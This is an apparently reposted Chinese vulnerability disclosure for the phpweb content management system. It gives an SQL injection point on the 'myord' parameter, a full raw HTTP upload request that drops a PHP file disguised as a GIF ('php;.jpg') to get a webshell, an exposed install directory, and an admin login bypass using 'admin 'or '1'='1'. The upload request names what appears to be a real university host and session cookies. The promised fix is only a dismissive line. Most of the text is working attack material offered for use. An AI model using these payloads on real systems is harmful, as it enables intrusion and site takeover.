当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

phpweb 注射+上传+安装文件漏洞+万能密码(含修复方案)

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

#  Author: lostowlf home: hi.baidu.com/nginxshell

测试:
******sqlinjection*******
?myord=1{sqlinjection}

... mp;key=&myord=1 {sqlinjection}

***********getshell********
POST /kedit/upload_cgi/upload.php HTTP/1.0"
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: ... p;pid=all&page=
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7db516c0118
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: lib.jlnu.edu.cn
Proxy-Connection: Keep-Alive
Cookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657- D1 F$ M( R3 _8 {3 U. V
Content-Length: 6620

-----------------------------7db516c0118
Content-Disposition: form-data; name="fileName"

201110121318373662005.php;.jpg
-----------------------------7db516c0118
Content-Disposition: form-data; name="attachPath"

news/pics/
-----------------------------7db516c0118
Content-Disposition: form-data; name="fileData"; filename="C:\6.gif"
Content-Type: image/gif
gif89a
');?>


*********install file:**********
/base/install/

*********admin********
/admin.php
username: admin 'or '1'='1
username: admin 'or '1'='1

修复方案:过滤加上传漏洞修复,算了,www.xuhantao.com,涛涛电脑知识网,还是换一套程序吧

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1